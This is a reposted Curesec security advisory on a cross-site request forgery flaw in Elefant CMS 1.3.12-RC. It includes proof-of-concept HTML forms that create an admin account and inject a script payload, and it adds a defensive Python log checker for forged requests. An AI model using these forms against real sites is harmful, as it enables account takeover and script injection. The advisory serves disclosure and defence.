Elefant CMS 1.3.12-RC Cross Site Request Forgery

CVE:                CVE-2014-9407
Category:           CWE-352
Price:              $500
Severity:           Medium
Author:             Unknown
Risk:               High
Exploitation Type:  Remote
Date:               2017-02-18
CPE:                cpe:cpe:/a:elefant_cms:elefant:1.3.12_rc
Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2017020180

Below is a copy:

Elefant CMS 1.3.12-RC Cross Site Request Forgery
Security Advisory - Curesec Research Team

1. Introduction

Affected Product:     Elefant CMS 1.3.12-RC
Fixed in:             1.3.13
Fixed Version Link:   https://github.com/jbroadway/elefant/releases/tag/elefant_1_3_13_rc
Vendor Website:       https://www.elefantcms.com/
Vulnerability Type:   CSRF
Remote Exploitable:   Yes
Reported to vendor:   09/05/2016
Disclosed to public:  02/02/2017
Release mode:         Coordinated Release
CVE:                  n/a (not requested)
Credits:              Tim Coen of Curesec GmbH

2. Overview

Elefant is a content management system written in PHP. In version 1.3.12-RC, it
is vulnerable to cross site request forgery. If a victim visits a website that
contains specially crafted code while logged into Elefant, an attacker can,
for example, create a new admin account without the victim's knowledge.

3. Details

CVSS: Medium 5.1 AV:N/AC:H/Au:N/C:P/I:P/A:P

There is no CSRF protection for various components, allowing, among other
things, the creation of new admin accounts or XSS attacks.

Proof of Concept:

Create New Admin:

    <html>
      <body>
        <form action="http://localhost/user/add" method="POST">
          <input type="hidden" name="name" value="admin3" />
          <input type="hidden" name="email" value="[email protected]" />
          <input type="hidden" name="password" value="admin3" />
          <input type="hidden" name="verify_pass" value="admin3" />
          <input type="hidden" name="type" value="admin" />
          <input type="hidden" name="company" value="" />
          <input type="hidden" name="title" value="" />
          <input type="hidden" name="website" value="" />
          <input type="hidden" name="photo" value="" />
          <input type="hidden" name="about" value="" />
          <input type="hidden" name="phone" value="" />
          <input type="hidden" name="fax" value="" />
          <input type="hidden" name="address" value="" />
          <input type="hidden" name="address2" value="" />
          <input type="hidden" name="city" value="" />
          <input type="hidden" name="state" value="" />
          <input type="hidden" name="country" value="" />
          <input type="hidden" name="zip" value="" />
          <input type="submit" value="Submit request" />
        </form>
      </body>
    </html>

XSS:

    <html>
      <body>
        <form action="http://localhost/designer/preview" method="POST">
          <input type="hidden" name="layout" value="<img src=no onerror=alert(1)>" />
          <input type="submit" value="Submit request" />
        </form>
      </body>
    </html>

4. Solution

To mitigate this issue please upgrade at least to version 1.3.13.

Please note that a newer version might already be available.
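
An added example, not part of the Curesec advisory or of Elefant's code: a log check that flags POST requests to the two endpoints from the proof of concept when the Referer is missing or names another host. It assumes combined-format access logs and a hypothetical site host cms.example.test; the sample log lines are constructed.

```python
import re
from urllib.parse import urlsplit

# Endpoints used in the advisory's proof of concept.
SENSITIVE_PATHS = {"/user/add", "/designer/preview"}

# Apache/nginx "combined" access log format (assumed).
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "[^"]*"$'
)

def classify(line, site_host):
    """Return None for irrelevant lines, else a dict describing the request."""
    m = LINE_RE.match(line.strip())
    if not m or m["method"] != "POST":
        return None  # both forms in the proof of concept submit via POST
    path = urlsplit(m["target"]).path.rstrip("/")  # drop query string and trailing slash
    if path not in SENSITIVE_PATHS:
        return None
    referer = m["referer"]
    if referer in ("", "-"):
        verdict = "no-referer"
    else:
        # Exact host comparison: a substring test would accept look-alike hosts.
        host = (urlsplit(referer).hostname or "").lower()
        verdict = "same-site" if host == site_host.lower() else "cross-site"
    return {"verdict": verdict, "path": path, "ip": m["ip"],
            "time": m["ts"], "status": int(m["status"]), "referer": referer}

def suspicious(lines, site_host):
    """Requests to the sensitive endpoints that did not come from the site itself."""
    hits = (classify(line, site_host) for line in lines)
    return [h for h in hits if h and h["verdict"] != "same-site"]

# Constructed sample log lines for the hypothetical site cms.example.test.
SAMPLE_LOG = [
    '192.0.2.10 - - [03/Feb/2017:10:01:12 +0000] "POST /user/add HTTP/1.1" 302 512 "https://cms.example.test/user/add" "Mozilla/5.0"',
    '192.0.2.10 - - [03/Feb/2017:10:07:45 +0000] "POST /user/add HTTP/1.1" 302 512 "http://other.example/promo.html" "Mozilla/5.0"',
    '192.0.2.10 - - [03/Feb/2017:10:08:02 +0000] "POST /designer/preview?x=1 HTTP/1.1" 200 901 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [03/Feb/2017:10:09:30 +0000] "GET /user/add HTTP/1.1" 200 4096 "http://other.example/" "Mozilla/5.0"',
    '192.0.2.10 - - [03/Feb/2017:10:11:19 +0000] "POST /user/add/ HTTP/1.1" 302 512 "https://cms.example.test.other.example/" "Mozilla/5.0"',
    '192.0.2.10 - - [03/Feb/2017:10:12:00 +0000] "POST /blog/post HTTP/1.1" 302 128 "http://other.example/" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for hit in suspicious(SAMPLE_LOG, "cms.example.test"):
        print(hit["time"], hit["ip"], hit["path"], hit["verdict"], hit["status"], hit["referer"])
```

A missing Referer can also come from browser privacy settings, so "no-referer" hits are leads to review against the list of admin accounts rather than proof of a forged request.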

5. Report Timeline

09/05/2016 Informed Vendor about Issue, Vendor announces fix
11/07/2016 Asked Vendor if recent release fixes issues, Vendor confirmed
02/02/2017 Disclosed to public


Blog Reference:
https://www.curesec.com/blog/article/blog/Elefant-CMS-1312-RC-CSRF-189.html
 
--
blog:  https://www.curesec.com/blog
tweet: https://twitter.com/curesec

Curesec GmbH
Curesec Research Team
Josef-Orlopp-Straße 54
10365 Berlin, Germany



